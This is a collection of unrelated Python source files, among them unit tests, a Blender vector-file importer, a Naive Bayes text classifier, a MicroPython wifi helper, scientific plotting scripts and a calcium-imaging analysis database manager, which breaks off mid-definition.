self.db_configuration["user"] = self.db_user
if self.db_password is not None:
self.db_configuration["password"] = self.db_password
if self.db_node is not None:
self.db_configuration["host"] = self.db_node
self.extra_config = dict(**kwargs)
self.db_configuration.update(**self.extra_config)
def get_settings(self):
return dict(db_type=self.db_type,
db_name=self.db_name,
db_user=self.db_user,
db_password=self.db_password,
db_node=self.db_node,
**self.extra_config) | nilq/baby-python | python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2011 Alan Franzoni. APL 2.0 licensed.
from unittest import TestCase
from abc import abstractmethod
from pydenji.ducktypes.function_copy import copy_raw_func_only, fully_copy_func
@abstractmethod
def example_func(a, b, c=1):
return 1
class AbstractTestFunctionCopy(object):
def test_function_wrapper_preserves_function_arg_count(self):
wrapped = self.copy_func(example_func)
self.assertEquals(3, wrapped.func_code.co_argcount)
def test_function_wrapper_preserves_function_return_value(self):
wrapped = self.copy_func(example_func)
self.assertEquals(1, wrapped(1,2))
def test_wrapped_func_is_actually_a_copy(self):
wrapped = self.copy_func(example_func)
wrapped.someattribute = 3
self.assertFalse(getattr(example_func, "someattribute", False))
class TestRaw(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = copy_raw_func_only
def test_wrapped_function_is_never_abstract(self):
wrapped = self.copy_func(example_func)
self.assertFalse(getattr(wrapped, "__isabstractmethod__", False))
class TestCopyFuncFully(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = fully_copy_func
def test_wrapped_function_abstract_attributes_are_copied(self):
wrapped = self.copy_func(example_func)
self.assertTrue(wrapped.__isabstractmethod__)
| nilq/baby-python | python |
# Standard utils file
# Developed by Anodev Development (OPHoperHPO) (https://github.com/OPHoperHPO)
import time
import network
def wifi_connect(SSID, PASSWORD):
"""Connects to wifi."""
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('Connecting to network...')
sta_if.active(True)
sta_if.connect(SSID, PASSWORD)
timer = 30
while not sta_if.isconnected():
if timer == 0 and sta_if.isconnected() is False:
return False
time.sleep(1)
timer -= 1
print('Network config:', sta_if.ifconfig())
return sta_if
| nilq/baby-python | python |
# Lint as: python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common MLMD utility libraries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import TypeVar
from absl import logging
from tfx.orchestration import metadata
import ml_metadata as mlmd
from ml_metadata.proto import metadata_store_pb2
MetadataType = TypeVar('MetadataType', metadata_store_pb2.ArtifactType,
metadata_store_pb2.ContextType,
metadata_store_pb2.ExecutionType)
def register_type_if_not_exist(
metadata_handler: metadata.Metadata,
metadata_type: MetadataType,
) -> MetadataType:
"""Registers a metadata type if not exists.
Uses existing type if schema is superset of what is needed. Otherwise tries
to register new metadata type.
Args:
metadata_handler: A handler to access MLMD store.
metadata_type: The metadata type to register if does not exist.
Returns:
A MetadataType with id
Raises:
RuntimeError: If new metadata type conflicts with existing schema in MLMD.
ValueError: If metadata type is not expected.
"""
if metadata_type.id:
return metadata_type
if isinstance(metadata_type, metadata_store_pb2.ArtifactType):
get_type_handler = metadata_handler.store.get_artifact_type
put_type_handler = metadata_handler.store.put_artifact_type
elif isinstance(metadata_type, metadata_store_pb2.ContextType):
get_type_handler = metadata_handler.store.get_context_type
put_type_handler = metadata_handler.store.put_context_type
elif isinstance(metadata_type, metadata_store_pb2.ExecutionType):
get_type_handler = metadata_handler.store.get_execution_type
put_type_handler = metadata_handler.store.put_execution_type
else:
raise ValueError('Unexpected value type: %s.' % type(metadata_type))
try:
# Types can be evolved by adding new fields in newer releases.
# Here when upserting types:
# a) we enable `can_add_fields` so that type updates made in the current
# release are backward compatible with older release;
# b) we enable `can_omit_fields` so that the current release is forward
# compatible with any type updates made by future release.
type_id = put_type_handler(
metadata_type, can_add_fields=True, can_omit_fields=True)
logging.debug('Registering a metadata type with id %s.', type_id)
metadata_type = get_type_handler(metadata_type.name)
return metadata_type
except mlmd.errors.AlreadyExistsError:
existing_type = get_type_handler(metadata_type.name)
assert existing_type is not None, (
'Not expected to get None when getting type %s.' % metadata_type.name)
warning_str = (
'Conflicting properties comparing with existing metadata type '
'with the same type name. Existing type: '
'%s, New type: %s') % (existing_type, metadata_type)
logging.warning(warning_str)
raise RuntimeError(warning_str)
| nilq/baby-python | python |
import math, sys
from konlpy.tag import Okt
class BayesianFilter:
def __init__(self):
self.words=set()
self.word_dict={}
self.category_dict={}
def fit(self, text, category):
'''
텍스트를 읽어 학습
'''
pos=self.split(text)
for word in pos:
self.inc_word(word, category)
self.inc_category(category)
def split(self, text):
'''
형태소 분석
'''
twit=Okt()
posList=twit.pos(text, norm=True, stem=True)
for word in posList:
if word[1] in ["Josa", "Eomi", "Punctuation"]:
posList.remove(word)
return posList
def inc_word(self, word, category):
'''
카테고리 분류기
'''
if not category in self.word_dict:
self.word_dict[category]={}
if not word in self.word_dict[category]:
self.word_dict[category][word]=0
self.word_dict[category][word]+=1
self.words.add(word)
return
def inc_category(self, category):
'''
카테고리 수치 dict 생성
'''
if not category in self.category_dict:
self.category_dict[category]=0
self.category_dict[category]+=1
def predict(self, text):
'''
새로운 텍스트를 받아 카테고리 예측
'''
best_category=None
global gword
gword=self.split(text)
score_List=[]
max_score=-sys.maxsize
for category in self.category_dict.keys():
score=self.score(gword, category)
score_List.append((category, score))
if score>max_score:
max_score=score
best_category=category
return best_category, max_score
def score(self, words, category):
'''
카테고리마다 점수(확률) 리턴
'''
score=math.log(self.category_prob(category))
for word in words:
score+=math.log(self.word_prob(word, category))
return score
def category_prob(self, category):
'''
카테고리 점수 계산
'''
sum_categories=sum(self.category_dict.values())
category_v=self.category_dict[category]
return category_v / sum_categories
def word_prob(self, word, category):
'''
단어 확률 계산
'''
n=self.get_word_count(word, category)+1
# 광고에 속하는 등장횟수 총합 + 분류 대상 단어 총합
d=sum(self.word_dict[category].values())+len(gword)
# 총합 확률??
return n/d
def get_word_count(self, word, category):
'''
예측단어와 데이터셋 간 공통단어들의 카운트 계산
'''
if word in self.word_dict[category]:
return self.word_dict[category][word]
else:
return 0
| nilq/baby-python | python |
"""Role testing files using testinfra."""
def test_kubelet_package(host):
kubelet = host.package("kubelet")
assert kubelet.is_installed
assert kubelet.version.startswith("1.21")
def test_kubelet_service(host):
kubelet = host.service("kubelet")
assert kubelet.is_running
assert kubelet.is_enabled
| nilq/baby-python | python |
'''entre no sistema com dois valores e saia com a soma entre eles'''
v1 = int(input('Digite o primeiro valor: '))
v2 = int(input('Digite o segundo valor: '))
print('A soma de {} + {} = {} '.format(v1, v2, v1 + v2))
print('Acabou!')
| nilq/baby-python | python |
import tskit
import tszip
import matplotlib.pyplot as plt
import numpy as np
site_ts = str(snakemake.input.site_ts)
plot_path = str(snakemake.output.plot)
ts = tszip.decompress(site_ts)
for x in range(len(ts.populations())):
y = ts.tables.nodes.time[np.where(ts.tables.nodes.population==x)[0]]
plt.plot(np.log10(np.sort(y)+1), label=x)
plt.legend(title = 'population')
plt.ylabel('log10(node age+1)')
plt.xlabel('nodes within each population')
plt.savefig(plot_path)
| nilq/baby-python | python |
# import os
# import sys
# TEST_DIR = os.path.dirname(os.path.abspath(__file__))
# PROJECT_DIR = os.path.abspath(os.path.join(TEST_DIR, os.pardir, 'api'))
# sys.path.insert(0, PROJECT_DIR)
| nilq/baby-python | python |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
bl_info = {
"name": "Adobe Illustrator / PDF / SVG",
"author": "Howard Trickey",
"version": (1, 3),
"blender": (2, 80, 0),
"location": "File > Import-Export > Vector files (.ai, .pdf, .svg)",
"description": "Import Adobe Illustrator, PDF, and SVG",
"warning": "",
"doc_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Import-Export/AI_PDF_SVG",
"category": "Import-Export"}
if "bpy" in locals():
import imp
else:
from . import geom
from . import model
from . import vecfile
from . import import_vecfile
from . import offset
from . import pdf
from . import svg
from . import triquad
from . import art2polyarea
import math
import bpy
import bpy_extras.io_utils
from bpy.props import (BoolProperty,
EnumProperty,
FloatProperty,
IntProperty,
StringProperty
)
from bpy_extras.io_utils import ImportHelper
class VectorImporter(bpy.types.Operator, ImportHelper):
"""Load an AI or PDF or SVG file"""
bl_idname = "import_vec.aipdfsvg"
bl_label = "Import AI/PDF/SVG"
bl_options = {"UNDO"}
filter_glob : StringProperty(default="*.ai;*.pdf;*.svg", options={"HIDDEN"})
smoothness : IntProperty(name="Smoothness",
description="How closely to approximate curves",
default=1,
min=0,
max=100)
scale : FloatProperty(name="Scale",
description="Scale longer bounding box side to this size",
default=4.0,
min=0.1,
max=100.0,
unit="LENGTH")
subdiv_kind : EnumProperty(name="Subdivision Method",
description="Method for approximating curves with lines",
items=[ \
('UNIFORM', "Uniform",
"All curves bisected 'smoothness' times"),
('ADAPTIVE', "Adaptive",
"Curves subdivided until flat enough, as" \
" determined by 'smoothness'"),
('EVEN', "Even",
"Curves subdivided until segments have a common length," \
" determined by 'smoothness'"),
],
default='ADAPTIVE')
filled_only : BoolProperty(name="Filled paths only",
description="Only import filled paths",
default=True)
ignore_white : BoolProperty(name="Ignore white-filled",
description="Do not import white-filled paths",
default=True)
combine_paths : BoolProperty(name="Combine paths",
description="Use all paths when looking for holes",
default=False)
use_colors : BoolProperty(name="Use colors",
description="Use colors from vector file as materials",
default=False)
extrude_depth : FloatProperty(name="Extrude depth",
description="Depth of extrusion, if > 0",
default=0.0,
min=0.0,
max=100.0,
unit='LENGTH')
bevel_amount : FloatProperty(name="Bevel amount",
description="Amount of inward bevel, if > 0",
default=0.0,
min=0.0,
max=1000.0,
unit='LENGTH')
bevel_pitch : FloatProperty(name="Bevel pitch",
description="Angle of bevel from horizontal",
default=45 * math.pi / 180.0,
min=0.0,
max=89.0 * math.pi / 180.0,
unit='ROTATION')
cap_back : BoolProperty(name="Cap back",
description="Cap the back if extruding",
default=False)
true_scale : BoolProperty(name="True Scale",
description="Use true scale, with 1 meter = 1 blender unit",
default=False)
# some info display properties
num_verts : IntProperty(name="Number of vertices",
default=0)
num_faces : IntProperty(name="Number of faces",
default=0)
def draw(self, context):
layout = self.layout
box = layout.box()
box.label(text="Import Options")
box.prop(self, "smoothness")
box.prop(self, "scale")
box.prop(self, "true_scale")
box.prop(self, "subdiv_kind")
box.prop(self, "filled_only")
box.prop(self, "ignore_white")
box.prop(self, "combine_paths")
box.prop(self, "use_colors")
box.prop(self, "extrude_depth")
box.prop(self, "bevel_amount")
box.prop(self, "bevel_pitch")
box.prop(self, "cap_back")
if self.num_verts > 0:
layout.label(text="Ve:" + str(self.num_verts) + \
" | Fa:" + str(self.num_faces))
def action(self, context):
#convert the filename to an object name
if not self.filepath:
return
objname = self.filepath.split("\\")[-1].split("/")[-1]
if objname.find(".") > 0:
objname = objname.split(".")[0]
options = import_vecfile.ImportOptions()
if self.true_scale:
options.scaled_side_target = 0.0
else:
options.scaled_side_target = self.scale
options.quadrangulate = True
options.extrude_depth = self.extrude_depth
options.bevel_amount = self.bevel_amount
options.bevel_pitch = self.bevel_pitch
options.cap_back = self.cap_back
options.convert_options.subdiv_kind = self.subdiv_kind
options.convert_options.smoothness = self.smoothness
options.convert_options.filled_only = self.filled_only
options.convert_options.ignore_white = self.ignore_white
options.convert_options.combine_paths = self.combine_paths
(mdl, msg) = import_vecfile.ReadVecFileToModel(self.filepath, options)
if msg:
self.report({'ERROR'},
"Problem reading file " + self.filepath + ": " + msg)
return {'FINISHED'}
verts = mdl.points.pos
if self.true_scale:
# assume model units are 90 dpi, if svg file
# else 72 dpi
# convert to meters (1 inch = 0.0254 meters)
if self.filepath[-4:] in (".svg", ".SVG"):
s = 0.0254 / 90.0
print("svg s=", s)
else:
s = 0.0254 / 72.0
verts = [(s * v[0], s * v[1], s * v[2]) for v in verts]
faces = [f for f in mdl.faces if 3 <= len(f) <= 4]
mesh = bpy.data.meshes.new(objname)
mesh.from_pydata(verts, [], faces)
if self.use_colors:
add_colors(mesh, mdl.face_data)
mesh.update()
self.num_verts = len(verts)
self.num_faces = len(faces)
obj = bpy.data.objects.new(objname, mesh)
context.scene.collection.objects.link(obj)
bpy.ops.object.select_all(action='DESELECT')
obj.select_set(True)
context.view_layer.objects.active = obj
def execute(self, context):
self.action(context)
return {'FINISHED'}
def add_colors(mesh, colors):
# assume colors are parallel to faces in mesh
if len(colors) < len(mesh.polygons):
return
# use rgbtoindex to keep track of colors already
# seen and map them to indices into mesh.materials
rgbtoindex = {}
matnameprefix = "VImat." + mesh.name + "."
for i, c in enumerate(colors):
print("color for face", i)
if c not in rgbtoindex:
matname = matnameprefix + str(len(bpy.data.materials))
mat = bpy.data.materials.new(matname)
mat.diffuse_color = c
mesh.materials.append(mat)
cindex = len(mesh.materials) - 1
rgbtoindex[c] = cindex
else:
cindex = rgbtoindex[c]
mesh.polygons[i].material_index = cindex
def menu_import(self, context):
self.layout.operator(VectorImporter.bl_idname,
text="Vector files (.ai, .pdf, .svg)")
def register():
bpy.utils.register_class(VectorImporter)
bpy.types.TOPBAR_MT_file_import.append(menu_import)
def unregister():
bpy.utils.unregister_class(VectorImporter)
bpy.types.TOPBAR_MT_file_import.remove(menu_import)
if __name__ == "__main__":
register()
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import unittest as ut
import os.path
import stripeline.timetools as tt
import numpy as np
class TestTimeTools(ut.TestCase):
def testSplitTimeRangeSimple(self):
'''Test split_time_range against a very simple input'''
result = tt.split_time_range(
time_length=2.0, num_of_chunks=2, sampfreq=2.0, time0=0.5)
self.assertEqual(len(result), 2)
self.assertEqual(result[0], tt.TimeChunk(
start_time=0.5, num_of_samples=2))
self.assertEqual(result[1], tt.TimeChunk(
start_time=1.5, num_of_samples=2))
def testSplitTimeRangeComplex(self):
'''Test split_time_range against a tricky input'''
result = tt.split_time_range(
time_length=10.0, num_of_chunks=4, sampfreq=1.0, time0=2.0)
self.assertEqual(len(result), 4)
self.assertEqual(result[0], tt.TimeChunk(
start_time=2.0, num_of_samples=2))
self.assertEqual(result[1], tt.TimeChunk(
start_time=5.0, num_of_samples=2))
self.assertEqual(result[2], tt.TimeChunk(
start_time=7.0, num_of_samples=2))
self.assertEqual(result[3], tt.TimeChunk(
start_time=10.0, num_of_samples=2))
class TestToiProviders(ut.TestCase):
'Test classes like ToiProvider and FitsToiProvider'
def test_split(self):
'Verify that "split_into_n" returns the expected results.'
self.assertEqual(tuple(tt.split_into_n(10, 4)), (2, 3, 2, 3))
self.assertEqual(tuple(tt.split_into_n(201, 2)), (100, 101))
def test_toi_splitting(self):
'Verify that "assign_toi_files_to_processes" returns the expected results.'
samples_per_processes = [110, 90]
fits_files = [tt.ToiFile(file_name='A.fits', num_of_samples=40),
tt.ToiFile(file_name='B.fits', num_of_samples=60),
tt.ToiFile(file_name='C.fits', num_of_samples=30),
tt.ToiFile(file_name='D.fits', num_of_samples=70)]
result = tt.assign_toi_files_to_processes(
samples_per_processes, fits_files)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 3)
self.assertEqual(len(result[1]), 2)
segment0, segment1 = tuple(result)
self.assertEqual(segment0[0],
tt.ToiFileSegment(file_name='A.fits',
first_element=0,
num_of_elements=40))
self.assertEqual(segment0[1],
tt.ToiFileSegment(file_name='B.fits',
first_element=0,
num_of_elements=60))
self.assertEqual(segment0[2],
tt.ToiFileSegment(file_name='C.fits',
first_element=0,
num_of_elements=10))
self.assertEqual(segment1[0],
tt.ToiFileSegment(file_name='C.fits',
first_element=10,
num_of_elements=20))
self.assertEqual(segment1[1],
tt.ToiFileSegment(file_name='D.fits',
first_element=0,
num_of_elements=70))
def test_fits_tois(self):
'Verify that FitsToiProvider is able to load some real data from FITS files'
test_file_path = os.path.dirname(__file__)
file_names = [os.path.join(test_file_path, x) for x in ['toi_test_A.fits',
'toi_test_B.fits',
'toi_test_C.fits']]
file_layout = \
tt.FitsTableLayout(time_col=tt.FitsColumn(hdu=1, column='TIME'),
theta_col=tt.FitsColumn(hdu=2, column=0),
phi_col=tt.FitsColumn(hdu=2, column=1),
psi_col=tt.FitsColumn(hdu=2, column=2),
signal_cols=[
tt.FitsColumn(hdu=3, column='DET_Q1'),
tt.FitsColumn(hdu=3, column='DET_Q2'),
tt.FitsColumn(hdu=3, column='DET_U1'),
tt.FitsColumn(hdu=3, column='DET_U2')
])
# Create a set of FitsToiProviders, one for each MPI rank. Note that we do
# *not* really use MPI here (comm is None): we just want to check that
# the segment is loaded correctly for each rank
num_of_processes = 2
providers = [tt.FitsToiProvider(rank=i,
num_of_processes=num_of_processes,
file_names=file_names,
file_layout=file_layout,
comm=None)
for i in range(num_of_processes)]
# Check that get_time works
self.assertTrue(np.allclose(
providers[0].get_time(), np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])))
self.assertTrue(np.allclose(
providers[1].get_time(), np.array([8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0])))
# Check that get_pointings work
theta0, phi0 = providers[0].get_pointings()
theta1, phi1 = providers[1].get_pointings()
self.assertTrue(np.allclose(
theta0, np.array([0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6])))
self.assertTrue(np.allclose(
theta1, np.array([0.5, 0.4, 0.3, 0.0, 0.1, 0.2, 0.3, 0.4])))
self.assertTrue(np.allclose(
phi0, np.array([0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.0])))
self.assertTrue(np.allclose(
phi1, np.array([0.2, 0.4, 0.6, 0.0, 0.01, 0.02, 0.03, 0.04])))
# Check that get_signal works, both when passing an integer and a string
sig_from_idx = providers[0].get_signal(0)
sig_from_name = providers[0].get_signal('Q1')
self.assertTrue(np.allclose(sig_from_idx, sig_from_name))
self.assertTrue(np.allclose(
sig_from_idx, np.array([0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])))
| nilq/baby-python | python |
#!/usr/bin/env pypy
import sys
from random import *
if len(sys.argv) < 3:
print "Usage: ", sys.argv[0], " [N] [M]"
exit(-1)
n = int(sys.argv[1])
m = int(sys.argv[2])
CMAX = 100
print n, m
assert m >= n - 1
for v in range(2, n + 1):
u = randrange(1, v)
w = randint(1, CMAX)
print u, v, w
for i in range(0, m - n + 1):
u = randint(1, n)
v = randint(1, n)
w = randint(1, CMAX)
print u, v, w
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 23 15:24:53 2019
@author: melisa
"""
import pandas as pd
import logging
import server as connect
import math
# Paths
analysis_states_database_path = 'references/analysis/analysis_states_database.xlsx'
backup_path = 'references/analysis/backup/'
parameters_path = 'references/analysis/parameters_database.xlsx'
## GENERAL AUXILIARY FUNCIONS
def get_query_from_dict(dictionary):
query = ''
for key in dictionary:
if dictionary[key] == None:
logging.warning('There is a None in the dictionary. None s are not allowed!')
if query != '':
query += ' & '
query += f'{key} == {dictionary[key]}'
return query
## this class only creates a structure where related to the way the data base is structured.
## It has a method related to the value of the step in interest.
class data_structure():
def __init__(self):
# Define the steps in the pipeline (in order)
self.steps = [
'decoding',
'cropping', # spatial borders that are unusable (due to microenscope border
# or blood clot) are removed
'motion_correction', # individual trial movies (5 min) are rigidly or
# piecewise rigidly motion corrected
'alignment', # Multiple videos (e.g. all trials of a session, 210 min) are
# rigid motion corrected to each other, resulting in a long aligned video
'source_extraction', # neural activity is deconvolved from the videos
# trial-wise or session-wise
'component_evaluation'
]
# Multi Index Structure
self.data = ['mouse', 'session', 'trial', 'is_rest']
self.analysis = [f'{step}_v' for step in steps]
self.data_analysis = self.data+ self.analysis
# Columns
self.columns = self.data + ['experiment_parameters',
'experiment_comments',
'raw_output',
'raw_comments']
# for each step, add a 'v' (version), 'parameters', 'output' and 'comments' columns
for step in steps:
self.columns += [f'{step}_{idx}' for idx in ['v','parameters','output','comments']]
self.columns += ['analyzed_Sebastian'] # whether or not Sebastian has analyzed the data fully
def open_database(self, path = analysis_states_database_path):
'''
This function reads the analysis states database (.xlsx file) using the correct
settings as a multi-index dataframe.
'''
if os.getlogin() == 'sebastian':
logging.info('Downloading analysis states database...')
ssh = connect.get_SSH_connection()
sftp = ssh.open_sftp()
sftp.get(os.environ['PROJECT_DIR_SERVER'] + path, os.environ['PROJECT_DIR_LOCAL'] + path)
sftp.close()
ssh.close()
logging.info('Downloaded analysis states database')
return pd.read_excel(path, dtype = {'date' : 'str', 'time' : 'str'}).set_index(self.data_analysis)
def get_step_index(self,step):
'''
This function returns the step index (int) given
a step name (str)
'''
try:
return steps.index(step)
except:
logging.error(f'Not a valid step. Valid values are: {steps}')
return
class data_configuration():
def __init__(self, mouse = None, session = None, trial = None, is_rest = None,
decoding_v = None, cropping_v = None,
motion_correction_v = None, alignment_v = None,
source_extraction_v = None,component_evaluation_v=None):
self.mouse=mouse
self.session=session
self.trial=trial
self.is_rest=is_rest
self.decoding = decoding_v
self.cropping = cropping_v
self.motion_correction = motion_correction_v
self.alignment = alignment_v
self.sourse_extraction = source_extraction_v
self.component_evaluation = component_evaluation_v
self.data_structure=data_structure()
def index_assignation(self):
index=(self.mouse,self.session,self.trial,self.is_rest,self.decoding,
self.cropping, self.motion_correction, self.alignment,
self.sourse_extraction, self.component_evaluation)
return index
def value_assignation(self):
assignation = {self.data_structure.data[0]:self.mouse, self.data_structure.data[1]:self.session, self.data_structure.data[2]:self.trial,
self.data_structure.data[3]:self.is_rest }
return assignation
def version_assignation(self):
assignation = {self.data_structure.analysis[0]:self.decoding, self.data_structure.analysis[1]:self.cropping, self.data_structure.analysis[2]:self.motion_correction,
self.data_structure.analysis[3]:self.alignment,self.data_structure.analysis[4]:self.sourse_extraction,self.data_structure.analysis[5]:self.component_evaluation}
return assignation
def get_parameters(self, step, path = parameters_path, download_= True):
'''
This function gets the parameters set for a certain trial (specified by mouse,
session, trial, is_rest) by the parameters database.
Args:
step: str
The step to which the parameters belong
download_: bool
Whether or not to download the parameters database from the server
before reading the local copy.
Returns:
params: dict
A dictionary containing the parameters.
'''
if os.getlogin() == 'sebastian' and download_:
logging.debug('Downloading parameters...')
ssh = connect.get_SSH_connection()
sftp = ssh.open_sftp()
sftp.get(os.environ['PROJECT_DIR_SERVER'] + path, os.environ['PROJECT_DIR_LOCAL'] + path)
sftp.close()
ssh.close()
step_index = self.data_structure.get_step_index(step)
df = pd.read_excel(path, sheet_name = step_index)
# Determine the parameters
param_names = [p for p in df.columns.tolist() if p not in (['type', 'comment'] + self.data_structure.data)]
# Store the default parameters
params = dict(df.query('type == "default"').iloc[0][param_names])
dtypes = dict(df.query('type == "dtype"').iloc[0][param_names])
# logging.debug(f'The following default parameters were found: {params}')
# Look for parameters specific to that mouse, session or trial
criteria = [self.mouse, self.session, self.trial, self.is_rest]
for i, criterium in enumerate(criteria):
if criterium != None:
query_dict = {self.data_structure.data[j] : criteria[j] for j in range(0, i + 1)}
query = get_query_from_dict(query_dict)
# logging.debug(f'Looking for specific parameters to {data_structure[i]} using query: \n {query}')
selected_rows = df.query(query)
selected_rows = selected_rows[selected_rows.isnull()[self.data_structure.data[i + 1:]].T.all().T]
if not selected_rows.empty:
# If specific parameters are found, apply them
# logging.debug(f'Found parameters specific to {data_structure[i]}: \n {selected_rows}')
params_update = dict(selected_rows.iloc[0][param_names])
# logging.debug(f'params_update: {params_update}')
new_update = {}
for key in params_update:
if type(params_update[key]) == str or not math.isnan(params_update[key]):
new_update[key] = params_update[key]
if len(new_update) != 0:
params.update(new_update)
# logging.debug(f'params after update: {params}')
# Evaluate the parameters (e.g. turn 'True' into True)
for key in param_names:
# if not eval(dtypes[key]) == type(params[key]):
# params[key] = eval(dtypes[key] + f'({params[key]})')
#
if dtypes[key] == 'boolean':
params[key] = bool(params[key])
elif dtypes[key] == 'str':
params[key] = str(params[key])
else:
try:
params[key] = eval(params[key])
except:
pass
return params
def set_parameters(self, step, setting_params, path = parameters_path, path_backup = backup_path , check = True, upload_ = True):
'''
This function sets the parameters set for a certain trial (specified by mouse,
session, trial, is_rest) in the parameters database.
Args:
step: str
The step to which the parameters belong
check: bool
Whether or not to ask for a final confirmation in the console
upload_: bool
Whether or not to upload the parameters database to the server
after writing to the local copy.
'''
query_dict=self.value_assignation()
#criteria = [self.mouse, self.trial, self.session, self.is_rest]
#query_dict = {self.data_structure.data[j] : criteria[j] for j in range(0, 4) if not criteria[j] == None}
# Load parameters dataframe
read = pd.ExcelFile(path)
df_dict = {}
for sheet_name in read.sheet_names:
df_dict[sheet_name] = pd.read_excel(path, sheet_name = sheet_name)
df = df_dict[step]
read.close()
if mouse != None:
if check:
print(f'Set the following parameters for {query_dict}? \n {params}')
cont = ''
while cont != 'yes' and cont != 'no':
print("Type 'yes' or 'no'")
cont = input()
if cont == 'no':
print('Cancelling')
return
print(f'Setting parameters for {query_dict} \n {params}')
# Check if there already is a row with these criteria
query = get_query_from_dict(query_dict)
selected_rows = df.query(query)
if not selected_rows.empty:
for idx, row in selected_rows.iterrows():
for key in params:
df.loc[idx, key] = str(params[key]) if isinstance(params[key], collections.Sequence) else params[key]
else:
params.update(query_dict)
df = df.append(params, ignore_index = True)
print(f'Set parameters for {query_dict} \n {params}')
else:
if check:
print(f'Set the following parameters as default? \n {params}')
cont = ''
while cont != 'yes' and cont != 'no':
print("Type 'yes' or 'no'")
cont = input()
if cont == 'no':
print(f'Cancelling')
return
print(f'Setting parameters as default: \n {params}')
selected_rows = df.query('type == "default"')
for idx, row in selected_rows.iterrows():
for key in params:
df.loc[idx, key] = str(params[key]) if isinstance(params[key], collections.Sequence) else params[key]
df_dict[step] = df
with pd.ExcelWriter(path) as writer:
for key in df_dict:
df_dict[key].to_excel(writer, sheet_name=key, index = False)
# Make a backup every day
make_backup(path, path_backup)
if eval(os.environ['LOCAL']) and upload_:
connect.upload(path)
def select(self, step):
'''
This function selects certain analysis states (specified by mouse, session, trial, is_rest,
decoding_v, cropping_v, etc.) to be used in a certain step.
If no analysis version is specified, it selects the latest one.
It makes sure there only one analysis state per trial.
This function is quite specialized. Refer to the pandas dataframe.query() method
for more general selection of analysis states.
Args:
step: str
Determines for which step the states are selected
**kwargs:
Used to give criteria for the states. May include data criteria
(e.g. mouse = 32314) or analysis criteria
(e.g. motion_correction_v = 3)
'''
# Get the step index
step_index = self.data_structure.get_step_index(step)
if not type(step_index) == int:
# If it is not a valid step, return
return
# Open the analysis states dataframe
states_df = self.data_structure.open_database()
# Select the specified data
query= get_query_from_dict(self.value_assignation())
if query != '':
logging.debug('Selecting rows corresponding to specified data')
logging.debug('query: ' + query)
selected_rows = states_df.query(query)
logging.debug(f'{len(selected_rows)} rows found')
else:
selected_rows = states_df
query_list = []
for ii in self.data_structure.steps[:step_index]: ## for all the steps before current step
if ii != 'alignment':
query_list.append(f'{step}_v != 0')
for ii in steps[step_index:]: ## for all steps that precede current step
query_list.append(f'{step}_v == 0')
query = ' and '.join(query_list)
logging.debug(f'Selecting rows with a non-zero input analysis version. Query: \n {query}')
selected_rows = selected_rows.query(query)
logging.debug(f'{len(selected_rows)} rows found')
# Select the specified analysis version
#analysis_criteria_0 = [decoding_v, cropping_v, motion_correction_v, alignment_v, source_extraction_v, None]
#analysis_criteria = {paths.analysis_structure[i]: analysis_criteria_0[i] for i in range(0,len(paths.analysis_structure)) if analysis_criteria_0[i] != None}
#query = get_query_from_dict(analysis_criteria)
query= self.version_assignation()
# Make sure there is only one row per trial
logging.debug('Making sure there is only one row per trial.')
for trial_index, trial_frame in selected_rows.groupby(level = self.data_structure.data):
# Determine the latest input step version per trial
sorted_frame = trial_frame.sort_values(self.data_structure.analysis).reset_index()
best_row = sorted_frame.loc[len(sorted_frame) - 1]
best_row_analysis_index = tuple((best_row.loc[j] for j in self.data_structure.analysis))
best_row_index = trial_index + best_row_analysis_index
# Now drop all failed rows from that frame
for row_index, row in trial_frame.iterrows():
if row_index != best_row_index:
selected_rows = selected_rows.drop(row_index)
logging.debug(f'{len(selected_rows)} rows found')
# If no trials were found.
if selected_rows.empty:
logging.warning(f'No rows were found for the specified parameters.')
return selected_rows
def create_file_name(self, step):
'''
This function returns a correct basename used for files
(str, e.g. "mouse_56166_session_2_trial_1_R_v1.3.1")
given an analysis state index and a step_index
'''
step_index = self.data_structure.get_step_index(step)
index = self.index_assignation()
# Make the string corresponding to the trial (_R for rest trials)
trial_R_string = f'{index[2]}_R' if index[3] else f'{index[2]}'
trial_string = f"mouse_{index[0]}_session_{index[1]}_trial_{trial_R_string}"
analysis_version_string = 'v'
for i in range(0, step_index + 1):
if i != 0:
analysis_version_string += '.'
analysis_version_string += str(index[4 + i])
filename = f'{trial_string}_{analysis_version_string}'
return filename
class movie():
'''
This class contains all methods that can be applied to a movie
'''
def __init__(self, step, mouse = None, session = None, trial = None, is_rest = None,
decoding_v = None, cropping_v = None,
